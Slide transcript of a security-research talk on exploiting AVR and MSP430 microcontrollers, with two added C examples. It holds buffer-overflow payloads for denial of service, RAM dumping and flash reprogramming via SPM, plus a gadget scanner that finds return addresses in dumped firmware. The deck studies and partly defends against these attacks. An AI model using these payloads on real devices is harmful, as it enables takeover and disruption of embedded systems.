
Vadim Bardakov - AVR & MSP exploitation


  1. AVR & MSP exploitation. Vadim Bardakov, Security Researcher, Digital Security (ERPScan)
  2–3. Why now?
     • Increasing use of microcontrollers (uC)
     • Nobody cares about code security for these devices
     • Increasing number of easily accessible data channels
     • Microcontroller firmware can be retrieved
     © 2002—2013, Digital Security
  4. Jokes
  5. What if it works?
  6. Oops…
  7–8. Firmware extraction. Side channel attacks:
     • Power analysis
     • Planarization
     • etc.
  9. Firmware extraction. MSP430:
     • FRAM
     • 5xx
     • 6xx
  10. RAM: MSP and AVR memory maps (diagram).
  11. RAM (AVR data space, low to high addresses): General purpose registers; I/O Special Function Registers; Additional I/O registers; Internal RAM.
  12–15. Stack errors (diagram): SP moves down through Internal RAM, whose cells are shown as 0xFF; interrupt handlers (UART, timers, comparators, INT0..X) push onto the same stack, and SP ends up below Internal RAM, in the register area.
  16–19. Stack errors (diagram, cells shown as 0x00): SP has run out of Internal RAM into the Additional I/O registers and I/O Special Function Registers. Reconfiguring peripheral devices… Lost control.
  20. Stack errors (diagram, cells shown as 0x20): the same descent. Seems OK.
  21. Stack errors: Global Variables sit in Internal RAM at an unknown offset.
  22. Stack errors: Bypassing checks.
  23. Buffer overflow. Access:
     • Local variables
     • Return address:
        • Compiler-generated instructions
        • Interruption
        • Bootloader
  24. Buffer overflow. Casual for UART handlers:

        ISR(UART0_RECEIVE_INTERRUPT)
        {
            UART_RxHead++;
            UART_RxBuf[UART_RxHead] = UART0_DATA;
        }

  25. Buffer overflow. Payload in Perl notation (`x` repeats a string, `.` concatenates; the escape sequences are reconstructed from the slide text): print "\xff" x B . "\x01\xFC" x N, i.e. B filler bytes followed by the word address 0x01FC, high byte first, repeated N times. Atmel Studio 6.1 build:

        000001FB CLI
        000001FC RJMP PC-0x0000

  26–27. Buffer overflow. Payload: print "\xff" x N, landing in the same CLI / RJMP PC-0x0000 loop at 0x1FB–0x1FC. Result: DoS.

  28. Buffer overflow. Dumping RAM:

        ISR(UART0_RECEIVE_INTERRUPT)
        {
            UART_RxHead++;
            UART_RxBuf[UART_RxHead] = UART0_DATA;
        }

        void uart_puts(const char *s)
        {
            while (*s)
                uart_putc(*s++);
        }

     Payload: print "\xff" x B . "\x01\xFC" x N . P, where P is the pointer that reaches uart_puts(p). The code that picks it up off the stack frame:

        000001C8 LDD  R24, Y+1
        000001CA LDD  R25, Y+2
        000001CB CALL 0x0000014E

     Slide legend: Load indirect with displacement; Load immediate; Call subroutine.
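The receive handler on slides 24 and 28 has no bounds check, so every byte the UART delivers after the buffer is full lands one address higher in data space, which is how the filler bytes and the address bytes of the payload end up where the compiler keeps a return address. The following is an added example, not code from the talk or from Digital Security: the slide's ISR beside a bounds-checked ring buffer, both driven on a host against a flat byte array that stands in for AVR data space, so the overflow can be observed without hardware. The buffer address (0x100), its size (16) and the position of the saved return address (the two bytes right after the buffer) are assumptions of the model; the payload shape "\xff" x B . "\x01\xFC" x N is the one on slide 25.

```c
/* Added example, not code from the talk or from Digital Security: the slide-24
 * receive ISR beside a bounds-checked version, both run on a host against a flat
 * byte array that stands in for AVR data space. Buffer location, buffer size and
 * the position of the "saved return address" are assumptions for the model. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define RAM_SIZE     512
#define RX_BUF_BASE  0x100                       /* assumed address of UART_RxBuf */
#define RX_BUF_SIZE  16                          /* power of two so a mask wraps the index */
#define RX_BUF_MASK  (RX_BUF_SIZE - 1)
#define RET_SLOT     (RX_BUF_BASE + RX_BUF_SIZE) /* assumed: return address right after the buffer */

static uint8_t ram[RAM_SIZE];

struct rx_state {
    uint8_t  head;
    uint8_t  tail;
    unsigned dropped;
};

struct rx_result {
    uint16_t slot;      /* value left in the return-address slot (AVR pushes the high byte first) */
    unsigned dropped;   /* bytes the hardened ISR refused */
};

/* Slide 24 as written: increment, then store, with no wrap and no full check.
 * head is uint8_t, so the furthest write is RX_BUF_BASE + 255, inside our model. */
static void isr_rx_vulnerable(struct rx_state *st, uint8_t data)
{
    st->head++;
    ram[RX_BUF_BASE + st->head] = data;
}

/* Hardened: wrap with the mask and drop the byte when the ring is full
 * (one slot is kept empty so full and empty are distinguishable). */
static void isr_rx_hardened(struct rx_state *st, uint8_t data)
{
    uint8_t next = (uint8_t)((st->head + 1) & RX_BUF_MASK);
    if (next == st->tail) {
        st->dropped++;
        return;
    }
    st->head = next;
    ram[RX_BUF_BASE + next] = data;
}

/* The slide-25 payload "\xff" x B . "\x01\xFC" x N: B filler bytes, then the
 * word address 0x01FC, high byte first, repeated N times. Returns the length. */
static size_t build_payload(uint8_t *out, size_t cap, size_t b, size_t n)
{
    size_t len = 0;
    for (size_t i = 0; i < b && len < cap; i++)
        out[len++] = 0xff;
    for (size_t i = 0; i < n && len + 1 < cap; i++) {
        out[len++] = 0x01;
        out[len++] = 0xFC;
    }
    return len;
}

/* Clear the model, push each byte through the chosen ISR as the UART would,
 * then report what now sits in the return-address slot. */
static struct rx_result deliver(void (*isr)(struct rx_state *, uint8_t),
                                const uint8_t *p, size_t len)
{
    struct rx_state st;
    struct rx_result r;
    memset(ram, 0, sizeof ram);
    memset(&st, 0, sizeof st);
    for (size_t i = 0; i < len; i++)
        isr(&st, p[i]);
    r.slot = (uint16_t)((ram[RET_SLOT] << 8) | ram[RET_SLOT + 1]);
    r.dropped = st.dropped;
    return r;
}

/* B = RX_BUF_SIZE - 1 fills the ring exactly; the next two bytes are the address. */
static struct rx_result run_scenario(int hardened)
{
    uint8_t payload[64];
    size_t len = build_payload(payload, sizeof payload, RX_BUF_SIZE - 1, 1);
    return deliver(hardened ? isr_rx_hardened : isr_rx_vulnerable, payload, len);
}

int main(void)
{
    struct rx_result v = run_scenario(0), h = run_scenario(1);
    printf("vulnerable ISR: return slot = 0x%04X\n", v.slot);
    printf("hardened ISR:   return slot = 0x%04X, dropped %u bytes\n", h.slot, h.dropped);
    return 0;
}
```

With the vulnerable handler the two bytes after the buffer read 0x01FC, exactly the word address the slide returns into; with the mask and full check the ring stops at 15 bytes, the two address bytes are dropped, and the slot is untouched. On a real AVR the masked version also costs nothing the original does not already pay, since the `&` replaces the unchecked increment.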
  29. Reprogramming
  30. Reprogramming. Open-source bootloaders suck in production.
  31. Reprogramming. Load code to RAM. Payload: print "\xff" x B . "\x00\x16" x N . ROPTail. The interrupt handler is ideal for ROP.
  32. Reprogramming. Gain control of SPM. Payload: print Code . "\x00\xFC" x N . P. Atmex:

        +00000343: 95E8    SPM    ; store program memory
        +00000351: 95E8    SPM    ; store program memory

     Writing code to FLASH.
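Every address in the payloads on slides 25, 28, 31 and 32 (the CLI / RJMP loop at 0x1FB–0x1FC, the SPM instructions at 0x343 and 0x351) has to be read out of the target's firmware first, which is why the talk opens with firmware extraction. The following is an added example, not code from the talk or from Digital Security, and it generalizes the slides' two cases into a small host-side gadget scanner for a dumped AVR flash image: flash is a sequence of little-endian 16-bit words addressed by word (the addresses Atmel Studio prints), so the scanner decodes words and reports word addresses, finds the CLI followed by RJMP-to-self used for the DoS, lists every SPM and how far each runs before the next RET, and encodes a word address the way it must be sent in the overflow (high byte first, as on slide 25). The opcodes are the AVR encodings; the sample image and the RET positions planted in it are constructed for this example.

```c
/* Added example, not code from the talk or from Digital Security: locate the
 * gadgets the payloads on slides 25, 28, 31 and 32 rely on in a dumped AVR flash
 * image. The sample image, and the RET positions in it, are constructed here;
 * the gadget addresses 0x1FB/0x1FC, 0x343 and 0x351 are the ones on the slides. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define OP_SPM        0x95E8u   /* SPM: store program memory (slide 32 shows 95E8) */
#define OP_CLI        0x94F8u   /* CLI: disable interrupts */
#define OP_RJMP_SELF  0xCFFFu   /* rjmp .-2, shown by Atmel Studio as RJMP PC-0x0000 */
#define OP_RET        0x9508u   /* RET: where a gadget hands control back to the stack */

#define SAMPLE_WORDS  0x400     /* constructed 2 KiB image */
static uint8_t sample_img[SAMPLE_WORDS * 2];

/* AVR flash words are stored little-endian and addressed by word. */
static uint16_t flash_word(const uint8_t *img, size_t waddr)
{
    return (uint16_t)(img[2 * waddr] | (img[2 * waddr + 1] << 8));
}

static void put_word(uint8_t *img, size_t waddr, uint16_t op)
{
    img[2 * waddr]     = (uint8_t)(op & 0xFF);
    img[2 * waddr + 1] = (uint8_t)(op >> 8);
}

/* First word address >= start holding `op`, or -1. 32-bit instructions (CALL,
 * JMP, LDS, STS) are not decoded, so a hit may be the second word of one of
 * them: confirm each candidate in a disassembler before using it. */
static long find_opcode(const uint8_t *img, size_t len, uint16_t op, size_t start)
{
    for (size_t w = start; w < len / 2; w++)
        if (flash_word(img, w) == op)
            return (long)w;
    return -1;
}

/* Word address of a CLI immediately followed by RJMP-to-self (the slide-25
 * hang), or -1 if the image has none. */
static long find_hang_loop(const uint8_t *img, size_t len)
{
    long w = -1;
    while ((w = find_opcode(img, len, OP_CLI, (size_t)(w + 1))) >= 0)
        if ((size_t)(w + 1) < len / 2 && flash_word(img, (size_t)w + 1) == OP_RJMP_SELF)
            return w;
    return -1;
}

/* Words from `waddr` to the next RET, or -1: how long a gadget runs before it
 * returns into whatever the overflow placed next on the stack. */
static long words_to_next_ret(const uint8_t *img, size_t len, size_t waddr)
{
    long r = find_opcode(img, len, OP_RET, waddr);
    return r < 0 ? -1 : r - (long)waddr;
}

/* Encode a word address as it must appear in the overflow: AVR pushes the return
 * address high byte first, so 0x01FC is sent as "\x01\xFC" (slide 25). */
static void ret_addr_bytes(uint16_t waddr, uint8_t out[2])
{
    out[0] = (uint8_t)(waddr >> 8);
    out[1] = (uint8_t)(waddr & 0xFF);
}

/* Constructed image: NOP (0x0000) everywhere except the gadgets at the slide
 * addresses; the RETs at 0x345 and 0x358 are placed by assumption. */
static const uint8_t *sample_image(void)
{
    memset(sample_img, 0, sizeof sample_img);
    put_word(sample_img, 0x1FB, OP_CLI);
    put_word(sample_img, 0x1FC, OP_RJMP_SELF);
    put_word(sample_img, 0x343, OP_SPM);
    put_word(sample_img, 0x345, OP_RET);
    put_word(sample_img, 0x351, OP_SPM);
    put_word(sample_img, 0x358, OP_RET);
    return sample_img;
}

int main(void)
{
    const uint8_t *img = sample_image();
    size_t len = sizeof sample_img;
    uint8_t b[2];
    for (long w = 0; (w = find_opcode(img, len, OP_SPM, (size_t)w)) >= 0; w++)
        printf("SPM at word 0x%04lX, RET %ld words later\n", w, words_to_next_ret(img, len, (size_t)w));
    long hang = find_hang_loop(img, len);
    ret_addr_bytes((uint16_t)(hang + 1), b);   /* slide 25 returns into the RJMP at 0x1FC */
    printf("CLI;RJMP loop at 0x%04lX -> push \"\\x%02X\\x%02X\"\n", hang, b[0], b[1]);
    return 0;
}
```

Run against a real dump (the output of the extraction step on slides 7–9, read as raw bytes) the same functions give the addresses to splice into the payload strings; the distance to the next RET is what decides whether an SPM hit can be chained the way slide 32 does or merely executes once and falls through.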
  33. Sum
     • Simple attacks can be conducted blindly
     • Different consequences:
        • DoS
        • Modifying device configuration
        • etc.
  34. Digital Security in Moscow: +7 (495) 223-07-86. Digital Security in Saint Petersburg: +7 (812) 703-15-47. www.dsec.ru, www.erpscan.com, v.bardakov@dsec.ru
